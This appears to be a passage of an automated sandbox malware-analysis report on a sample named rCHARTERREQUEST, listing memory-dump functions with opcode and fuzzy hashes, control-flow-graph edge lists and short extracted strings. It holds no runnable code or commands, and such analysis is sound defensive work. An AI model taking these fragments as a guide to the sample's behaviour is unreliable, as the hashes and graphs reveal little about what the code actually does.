                                                                                                          Function 06B81E36 Relevance: .2, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bb6ac6e5296d1d84fc46060ab130e6aa7c41b9c6c02578c02ea0ab49176cb9fb
                                                                                                          • Instruction ID: aadfef118396f14b8274ea3ce07a689817ecbb115f2fb678e859f094e1f5db24
                                                                                                          • Opcode Fuzzy Hash: bb6ac6e5296d1d84fc46060ab130e6aa7c41b9c6c02578c02ea0ab49176cb9fb
                                                                                                          • Instruction Fuzzy Hash: C97107B4A01219CFEB94DF69E544BADB7F1FB99304F1040A9E50AA7380DB385E41CB90
                                                                                                          Function 06B81E24 Relevance: .2, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8671072dc5f386c7d8dfabebd6dbb9502969ccd2745e02619f9b2db2838e20e3
                                                                                                          • Instruction ID: 72ace9daf7524a21ab344694aeb26d7f529f521675509308a7782e290ea7755e
                                                                                                          • Opcode Fuzzy Hash: 8671072dc5f386c7d8dfabebd6dbb9502969ccd2745e02619f9b2db2838e20e3
                                                                                                          • Instruction Fuzzy Hash: 6C7107B4A01219CFEB94DF69E544BADB7F1FB99304F1040A9E50AA7380DB385E41CB90
                                                                                                          Function 06B81E1E Relevance: .2, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 21bf78a6cf23f62f48f7b6a17a4416db7652b90689fda55a7ccb540c24858f6c
                                                                                                          • Instruction ID: 72ace9daf7524a21ab344694aeb26d7f529f521675509308a7782e290ea7755e
                                                                                                          • Opcode Fuzzy Hash: 21bf78a6cf23f62f48f7b6a17a4416db7652b90689fda55a7ccb540c24858f6c
                                                                                                          • Instruction Fuzzy Hash: 6C7107B4A01219CFEB94DF69E544BADB7F1FB99304F1040A9E50AA7380DB385E41CB90
                                                                                                          Function 06D824C8 Relevance: .2, Instructions: 166COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 298ef05eb0bc7ae933f8a4075a94e6ed1702299a22a7dc86fc1245e5390a85c2
                                                                                                          • Instruction ID: a9ff48003d5977f698714cffdfe2efdd55dfb3ec4e617d656ed89609e45b2090
                                                                                                          • Opcode Fuzzy Hash: 298ef05eb0bc7ae933f8a4075a94e6ed1702299a22a7dc86fc1245e5390a85c2
                                                                                                          • Instruction Fuzzy Hash: 4D81C174D01318CFEBA4DF5AD948BADBBF2FB89304F1080A9D449AB254DB745A85CF81
                                                                                                          Function 06B8228D Relevance: .2, Instructions: 164COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0ca5621b8572d97ed61d936364157ddea46b15bd9143ab0ef02c8664a3909a32
                                                                                                          • Instruction ID: dfcee5eb0fccbeed676d1e90d9994618d2b9f9e9282a52c3c946a9adb74319dc
                                                                                                          • Opcode Fuzzy Hash: 0ca5621b8572d97ed61d936364157ddea46b15bd9143ab0ef02c8664a3909a32
                                                                                                          • Instruction Fuzzy Hash: 7C7107B4A01219CFEB94DF69E544BADB7F1FB89304F1080A9E50AA7384DB385E45CF90
                                                                                                          Function 06B81E52 Relevance: .2, Instructions: 159COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f4afae89a6a138288077560f5f7d2df8d339c34e124258ba7e4f580fecd00b2f
                                                                                                          • Instruction ID: c298eb499df3c531c57714dab2aa338b954b79c02f93457b082040a60e32a481
                                                                                                          • Opcode Fuzzy Hash: f4afae89a6a138288077560f5f7d2df8d339c34e124258ba7e4f580fecd00b2f
                                                                                                          • Instruction Fuzzy Hash: 5B6118B4A01219CFEB94DF69E544BAD77F1FB99304F1050AAE50AE7384DB786E41CB80
                                                                                                          Function 06B82031 Relevance: .2, Instructions: 159COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f10db43dbc7c0f952bef16c6f67453c9be5fb3f2aca351ea362fec0f1b2d612e
                                                                                                          • Instruction ID: eec8f9fe9cbdbb691bb9cf94313a3792ef1e15a36874b2beb68c3cf7d1ddf865
                                                                                                          • Opcode Fuzzy Hash: f10db43dbc7c0f952bef16c6f67453c9be5fb3f2aca351ea362fec0f1b2d612e
                                                                                                          • Instruction Fuzzy Hash: FA6119B4A01219CFEB94EF59E544BADB7F1FB89305F1090A9E40AA7381DB785E41CF90
                                                                                                          Function 06B82108 Relevance: .2, Instructions: 158COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4df3ca06f2a9f28060b5e3da82b2f133d26f5373e929ec58fea9c6e6d4f50438
                                                                                                          • Instruction ID: c1918f6e80b5963681e61d1312ad0eb565ac4d20878c84b4a742314326b52286
                                                                                                          • Opcode Fuzzy Hash: 4df3ca06f2a9f28060b5e3da82b2f133d26f5373e929ec58fea9c6e6d4f50438
                                                                                                          • Instruction Fuzzy Hash: 116117B4A01219CFEB94EF59E544BADB7F1FB89304F1090A9E50AA7290DB785E41CF90
                                                                                                          Function 06437609 Relevance: .2, Instructions: 158COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8bb3eabafe43c82b3e15ed145be3e513ce95a68a1097024cf76df389ae60388a
                                                                                                          • Instruction ID: 8a496096f299d9b5b39c63f5de2bdf9d257f06cde8b84edaa063d80bfb7e7789
                                                                                                          • Opcode Fuzzy Hash: 8bb3eabafe43c82b3e15ed145be3e513ce95a68a1097024cf76df389ae60388a
                                                                                                          • Instruction Fuzzy Hash: 2B6114B0D01229CFEBA4CF6AC854BEEBBF1FB89314F10A0AAC459A7251D7745985CF44
                                                                                                          Function 064397F0 Relevance: .2, Instructions: 151COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2915a3a4efaefc3b047761ab9cc6fc9f7b54828be652a8bb5541c3072e16c587
                                                                                                          • Instruction ID: f1f396f1117aa9a285b52b28512ed9ac3c9c41eb7fd2d1f9eff2d03d6b092617
                                                                                                          • Opcode Fuzzy Hash: 2915a3a4efaefc3b047761ab9cc6fc9f7b54828be652a8bb5541c3072e16c587
                                                                                                          • Instruction Fuzzy Hash: 1F512D70D01228CFEB54DFAAD8447DDBBF2FB89304F14806AD409A7291E7B95986CF40
                                                                                                          Function 0180FCB0 Relevance: .1, Instructions: 146COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 400878cff10db087ba79464aa426e6b2a4e0cc57d4fd3ca1e94a56c61d895ca2
                                                                                                          • Instruction ID: bf3ff74c4ebcea2991a7326b830388b4363c1c6d0a2eb9f1ea6cee3402f03215
                                                                                                          • Opcode Fuzzy Hash: 400878cff10db087ba79464aa426e6b2a4e0cc57d4fd3ca1e94a56c61d895ca2
                                                                                                          • Instruction Fuzzy Hash: 54513974A1021ECFDB54CFA9D8846AEBBF2FF89304F148125E515EB385D738AA45CB90
                                                                                                          Function 06D824BB Relevance: .1, Instructions: 71COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bae5f9104aef08dc23b5844ea6c69db4b1be12335eb3c7bca072ae0e10014077
                                                                                                          • Instruction ID: 9dd795e47ba6e98bcf7a16422061d26b0171f1b14e901268e6c2067181bd0e0d
                                                                                                          • Opcode Fuzzy Hash: bae5f9104aef08dc23b5844ea6c69db4b1be12335eb3c7bca072ae0e10014077
                                                                                                          • Instruction Fuzzy Hash: 2221D771E056189BEB58CF9AD84479EFBF7AFC8300F14C1A9D809AB254DB714A46CB90
                                                                                                          Function 06D40448 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1026 6d40448-6d40470 1028 6d40472-6d404b9 1026->1028 1029 6d404be-6d404cc 1026->1029 1073 6d40915-6d4091c 1028->1073 1030 6d404ce-6d404d9 1029->1030 1031 6d404db 1029->1031 1032 6d404dd-6d404e4 1030->1032 1031->1032 1035 6d405cd-6d405d1 1032->1035 1036 6d404ea-6d404ee 1032->1036 1040 6d40627-6d40631 1035->1040 1041 6d405d3-6d405e2 1035->1041 1037 6d404f4-6d404f8 1036->1037 1038 6d4091d-6d40945 1036->1038 1042 6d4050a-6d40568 1037->1042 1043 6d404fa-6d40504 1037->1043 1047 6d4094c-6d40976 1038->1047 1044 6d40633-6d40642 1040->1044 1045 6d4066a-6d40690 1040->1045 1053 6d405e6-6d405eb 1041->1053 1080 6d4056e-6d405c8 1042->1080 1081 6d409db-6d40a05 1042->1081 1043->1042 1043->1047 1059 6d4097e-6d40994 1044->1059 1060 6d40648-6d40665 1044->1060 1065 6d40692-6d4069b 1045->1065 1066 6d4069d 1045->1066 1047->1059 1054 6d405e4 1053->1054 1055 6d405ed-6d40622 1053->1055 1054->1053 1055->1073 1083 6d4099c-6d409d4 1059->1083 1060->1073 1071 6d4069f-6d406c7 1065->1071 1066->1071 1088 6d406cd-6d406e6 1071->1088 1089 6d40798-6d4079c 1071->1089 1080->1073 1090 6d40a07-6d40a0d 1081->1090 1091 6d40a0f-6d40a15 1081->1091 1083->1081 1088->1089 1110 6d406ec-6d406fb 1088->1110 1092 6d40816-6d40820 1089->1092 1093 6d4079e-6d407b7 1089->1093 1090->1091 1095 6d40a16-6d40a53 1090->1095 1097 6d40822-6d4082c 1092->1097 1098 6d4087d-6d40886 1092->1098 1093->1092 1118 6d407b9-6d407c8 1093->1118 1108 6d40832-6d40844 1097->1108 1109 6d4082e-6d40830 1097->1109 1100 6d408be-6d4090d call 6d40c81 1098->1100 1101 6d40888-6d408b6 1098->1101 1124 6d40913 1100->1124 1101->1100 1114 6d40846-6d40848 1108->1114 1109->1114 1126 6d40713-6d40728 1110->1126 1127 6d406fd-6d40703 1110->1127 1122 6d40876-6d4087b 1114->1122 1123 6d4084a-6d4084e 1114->1123 1132 6d407e0-6d407eb 1118->1132 1133 6d407ca-6d407d0 1118->1133 1122->1097 1122->1098 1128 6d40850-6d40869 1123->1128 1129 6d4086c-6d4086f 1123->1129 1124->1073 1138 6d4075c-6d40765 1126->1138 1139 6d4072a-6d40756 1126->1139 1134 6d40705 1127->1134 1135 6d40707-6d40709 1127->1135 1128->1129 1129->1122 1132->1081 1143 6d407f1-6d40814 1132->1143 1141 6d407d4-6d407d6 1133->1141 1142 6d407d2 1133->1142 1134->1126 1135->1126 1138->1081 1140 6d4076b-6d40792 1138->1140 1139->1083 1139->1138 1140->1089 1140->1110 1141->1132 1142->1132 1143->1092 1143->1118
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hbq$Hbq$Hbq
                                                                                                          • API String ID: 0-2297679979
                                                                                                          • Opcode ID: c2eb346d12636380f7d1b8ad795ce85e02e65b42cdde07127d42888e562ae5b4
                                                                                                          • Instruction ID: 3f9c99a634f8179f7865f5495d40e93babf867ef57a92d39f56714036f6e4f09
                                                                                                          • Opcode Fuzzy Hash: c2eb346d12636380f7d1b8ad795ce85e02e65b42cdde07127d42888e562ae5b4
                                                                                                          • Instruction Fuzzy Hash: 6B124C30A00305CFDBA5EFA9D984AAEB7F2FF88300B248529D5469B751DB35EC45CB91
                                                                                                          Function 06D42108 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1157 6d42108-6d42145 1159 6d42167-6d4217d call 6d41f10 1157->1159 1160 6d42147-6d4214a 1157->1160 1166 6d424f3-6d42507 1159->1166 1167 6d42183-6d4218f 1159->1167 1273 6d4214c call 6d42a20 1160->1273 1274 6d4214c call 6d42a78 1160->1274 1275 6d4214c call 6d42a68 1160->1275 1163 6d42152-6d42154 1163->1159 1164 6d42156-6d4215e 1163->1164 1164->1159 1177 6d42547-6d42550 1166->1177 1168 6d42195-6d42198 1167->1168 1169 6d422c0-6d422c7 1167->1169 1170 6d4219b-6d421a4 1168->1170 1172 6d423f6-6d4245a call 6d41918 call 6d448b0 1169->1172 1173 6d422cd-6d422d6 1169->1173 1174 6d425e8 1170->1174 1175 6d421aa-6d421be 1170->1175 1223 6d42465-6d424ea call 6d41918 1172->1223 1173->1172 1178 6d422dc-6d423e8 call 6d41918 call 6d41ea8 call 6d41918 1173->1178 1179 6d425ed-6d425f1 1174->1179 1190 6d421c4-6d42259 call 6d41f10 * 2 call 6d41918 call 6d41ea8 call 6d41f50 call 6d41ff8 call 6d42060 1175->1190 1191 6d422b0-6d422ba 1175->1191 1181 6d42515-6d4251e 1177->1181 1182 6d42552-6d42559 1177->1182 1268 6d423f3-6d423f4 1178->1268 1269 6d423ea 1178->1269 1184 6d425f3 1179->1184 1185 6d425fc 1179->1185 1181->1174 1187 6d42524-6d42536 1181->1187 1188 6d425a7-6d425ae 1182->1188 1189 6d4255b-6d4259e call 6d41918 1182->1189 1184->1185 1197 6d425fd 1185->1197 1201 6d42546 1187->1201 1202 6d42538-6d4253d 1187->1202 1192 6d425b0-6d425c0 1188->1192 1193 6d425d3-6d425e6 1188->1193 1189->1188 1248 6d42278-6d422ab call 6d42060 1190->1248 1249 6d4225b-6d42273 call 6d41ff8 call 6d41918 call 6d41bc8 1190->1249 1191->1169 1191->1170 1192->1193 1209 6d425c2-6d425ca 1192->1209 1193->1179 1197->1197 1201->1177 1271 6d42540 call 6d45050 1202->1271 1272 6d42540 call 6d45041 1202->1272 1209->1193 1223->1166 1248->1191 1249->1248 1268->1172 1269->1268 1271->1201 1272->1201 1273->1163 1274->1163 1275->1163
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q$4'^q$4'^q
                                                                                                          • API String ID: 0-1196845430
                                                                                                          • Opcode ID: 3b57c78fa5ec4376907fa4c7326421d1cd702faa2c67db9d55c28edfc0385e51
                                                                                                          • Instruction ID: ea5caf849e40d3ee2c79b15393934a0849f13daa03919c546a81a7428e63fce8
                                                                                                          • Opcode Fuzzy Hash: 3b57c78fa5ec4376907fa4c7326421d1cd702faa2c67db9d55c28edfc0385e51
                                                                                                          • Instruction Fuzzy Hash: 09F1FE34A00218CFCB44EF64D998EADB7B2FF88300F518559E915AB3A5DB71ED82CB50
                                                                                                          Function 06D466E0 Relevance: 4.1, Strings: 3, Instructions: 368COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1277 6d466e0-6d466f0 1278 6d466f6-6d466fa 1277->1278 1279 6d46809-6d4682e 1277->1279 1280 6d46835-6d4685a 1278->1280 1281 6d46700-6d46709 1278->1281 1279->1280 1282 6d46861-6d46883 1280->1282 1281->1282 1283 6d4670f-6d46736 1281->1283 1296 6d4688c-6d46897 1282->1296 1294 6d4673c-6d4673e 1283->1294 1295 6d467fe-6d46808 1283->1295 1297 6d46740-6d46743 1294->1297 1298 6d4675f-6d46761 1294->1298 1299 6d4689e-6d468b5 1296->1299 1297->1299 1300 6d46749-6d46753 1297->1300 1301 6d46764-6d46768 1298->1301 1299->1296 1308 6d468b7-6d468f4 1299->1308 1300->1299 1303 6d46759-6d4675d 1300->1303 1304 6d467c9-6d467d5 1301->1304 1305 6d4676a-6d46779 1301->1305 1303->1298 1303->1301 1304->1299 1306 6d467db-6d467f8 1304->1306 1305->1299 1311 6d4677f-6d467c6 1305->1311 1306->1294 1306->1295 1316 6d468f6-6d4690a call 6d46bb0 1308->1316 1317 6d46918-6d4692f 1308->1317 1311->1304 1393 6d4690d call 6d46df8 1316->1393 1394 6d4690d call 6d46f59 1316->1394 1326 6d46935-6d46a1b call 6d41f10 call 6d41918 * 2 call 6d41f50 call 6d45718 call 6d41918 call 6d448b0 call 6d427b8 1317->1326 1327 6d46a20-6d46a30 1317->1327 1322 6d46913 1325 6d46b43-6d46b4e 1322->1325 1333 6d46b50-6d46b60 1325->1333 1334 6d46b7d-6d46b9e call 6d42060 1325->1334 1326->1327 1336 6d46a36-6d46b10 call 6d41f10 * 2 call 6d426c8 call 6d41918 * 2 call 6d41bc8 call 6d42060 call 6d41918 1327->1336 1337 6d46b1e-6d46b3a call 6d41918 1327->1337 1346 6d46b70-6d46b78 call 6d427b8 1333->1346 1347 6d46b62-6d46b68 1333->1347 1389 6d46b12 1336->1389 1390 6d46b1b 1336->1390 1337->1325 1346->1334 1347->1346 1389->1390 1390->1337 1393->1322 1394->1322
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq$(bq$Hbq
                                                                                                          • API String ID: 0-2835675688
                                                                                                          • Opcode ID: 7527d4e4665f44b966bc6a8ff52a5fc65ff2d75792bf769ce4afa179a4e2b074
                                                                                                          • Instruction ID: 03160991f898d516e2c0b89789db626af7cc7baec66108eb3c2e0523870b9ba1
                                                                                                          • Opcode Fuzzy Hash: 7527d4e4665f44b966bc6a8ff52a5fc65ff2d75792bf769ce4afa179a4e2b074
                                                                                                          • Instruction Fuzzy Hash: 3EE13234A00209DFCB44EF64D9949AEBBB2FF89300F118569E9166B364DF34ED85CB91
                                                                                                          Function 06B436E8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1932794004.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q$4'^q
                                                                                                          • API String ID: 0-2697143702
                                                                                                          • Opcode ID: ad475382ed3e31bb4519b73b3248320f59eedb87cb1bac6a1112eb01c10dd3f9
                                                                                                          • Instruction ID: 0ea4242b76c6d60c818eb5a2f631e5bc112eacd96ace12c7ba1d420ad24703d2
                                                                                                          • Opcode Fuzzy Hash: ad475382ed3e31bb4519b73b3248320f59eedb87cb1bac6a1112eb01c10dd3f9
                                                                                                          • Instruction Fuzzy Hash: 6642F5B4E44209CFDF95EFA6D498AADBBB2FF48300F148099D512A7354CB389846DF91
                                                                                                          Function 06B446F8 Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2330 6b446f8-6b44723 2331 6b44725 2330->2331 2332 6b4472a-6b44749 2330->2332 2331->2332 2333 6b4476a 2332->2333 2334 6b4474b-6b44754 2332->2334 2335 6b4476d-6b44771 2333->2335 2336 6b44756-6b44759 2334->2336 2337 6b4475b-6b4475e 2334->2337 2339 6b44d2c-6b44d43 2335->2339 2338 6b44768 2336->2338 2337->2338 2338->2335 2341 6b44776-6b4477a 2339->2341 2342 6b44d49-6b44d4d 2339->2342 2343 6b4477c-6b447d7 2341->2343 2344 6b4477f-6b44783 2341->2344 2345 6b44d82-6b44d86 2342->2345 2346 6b44d4f-6b44d7f 2342->2346 2354 6b447dc-6b447e0 2343->2354 2355 6b447d9-6b44835 2343->2355 2348 6b44785-6b44792 2344->2348 2349 6b447ac-6b447ce 2344->2349 2350 6b44da7 2345->2350 2351 6b44d88-6b44d91 2345->2351 2346->2345 2373 6b4479b-6b447a9 2348->2373 2349->2339 2356 6b44daa-6b44db0 2350->2356 2352 6b44d93-6b44d96 2351->2352 2353 6b44d98-6b44d9b 2351->2353 2359 6b44da5 2352->2359 2353->2359 2361 6b447e2-6b44806 2354->2361 2362 6b44809-6b4482c 2354->2362 2364 6b44837-6b44898 2355->2364 2365 6b4483a-6b4483e 2355->2365 2359->2356 2361->2362 2362->2339 2374 6b4489d-6b448a1 2364->2374 2375 6b4489a-6b448f6 2364->2375 2370 6b44867-6b4487e 2365->2370 2371 6b44840-6b44864 2365->2371 2385 6b44880-6b44886 2370->2385 2386 6b4488e-6b4488f 2370->2386 2371->2370 2373->2349 2379 6b448a3-6b448c7 2374->2379 2380 6b448ca-6b448ed 2374->2380 2387 6b448f8-6b44954 2375->2387 2388 6b448fb-6b448ff 2375->2388 2379->2380 2380->2339 2385->2386 2386->2339 2396 6b44956-6b449b2 2387->2396 2397 6b44959-6b4495d 2387->2397 2390 6b44901-6b44925 2388->2390 2391 6b44928-6b4494b 2388->2391 2390->2391 2391->2339 2406 6b449b4-6b44a10 2396->2406 2407 6b449b7-6b449bb 2396->2407 2400 6b44986-6b449a9 2397->2400 2401 6b4495f-6b44983 2397->2401 2400->2339 2401->2400 2416 6b44a15-6b44a19 2406->2416 2417 6b44a12-6b44a73 2406->2417 2410 6b449e4-6b44a07 2407->2410 2411 6b449bd-6b449e1 2407->2411 2410->2339 2411->2410 2419 6b44a42-6b44a59 2416->2419 2420 6b44a1b-6b44a3f 2416->2420 2426 6b44a75-6b44add 2417->2426 2427 6b44a78-6b44a7c 2417->2427 2436 6b44a69-6b44a6a 2419->2436 2437 6b44a5b-6b44a61 2419->2437 2420->2419 2438 6b44ae2-6b44ae6 2426->2438 2439 6b44adf-6b44b47 2426->2439 2429 6b44ab1-6b44ad4 2427->2429 2430 6b44a7e-6b44aae 2427->2430 2429->2339 2430->2429 2436->2339 2437->2436 2441 6b44ae8-6b44b18 2438->2441 2442 6b44b1b-6b44b3e 2438->2442 2447 6b44b4c-6b44b50 2439->2447 2448 6b44b49-6b44bb1 2439->2448 2441->2442 2442->2339 2449 6b44b85-6b44ba8 2447->2449 2450 6b44b52-6b44b82 2447->2450 2457 6b44bb6-6b44bba 2448->2457 2458 6b44bb3-6b44c1b 2448->2458 2449->2339 2450->2449 2465 6b44bbc-6b44bec 2457->2465 2466 6b44bef-6b44c12 2457->2466 2467 6b44c20-6b44c24 2458->2467 2468 6b44c1d-6b44c85 2458->2468 2465->2466 2466->2339 2475 6b44c26-6b44c56 2467->2475 2476 6b44c59-6b44c7c 2467->2476 2477 6b44c87-6b44cec 2468->2477 2478 6b44c8a-6b44c8e 2468->2478 2475->2476 2476->2339 2487 6b44d21-6b44d24 2477->2487 2488 6b44cee-6b44d1e 2477->2488 2485 6b44c90-6b44cc0 2478->2485 2486 6b44cc3-6b44ce6 2478->2486 2485->2486 2486->2339 2487->2339 2488->2487
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1932794004.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q$4'^q
                                                                                                          • API String ID: 0-2697143702
                                                                                                          • Opcode ID: 93f5622e1d05be66ac88fcfc1ae2b4da3abe6d27c52ab11ed56126309813262a
                                                                                                          • Instruction ID: 435b6929322ac9a7bb74f14b1eb6e647a60543b59333448b873e6f1a4b41f2ca
                                                                                                          • Opcode Fuzzy Hash: 93f5622e1d05be66ac88fcfc1ae2b4da3abe6d27c52ab11ed56126309813262a
                                                                                                          • Instruction Fuzzy Hash: 8022CF74D01258CFCBA4EFA9C5446ACBBB2FF4A306F6080AAC416AB354CB359D45DF51
                                                                                                          Function 06B8C6B9 Relevance: 3.0, Strings: 2, Instructions: 484COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
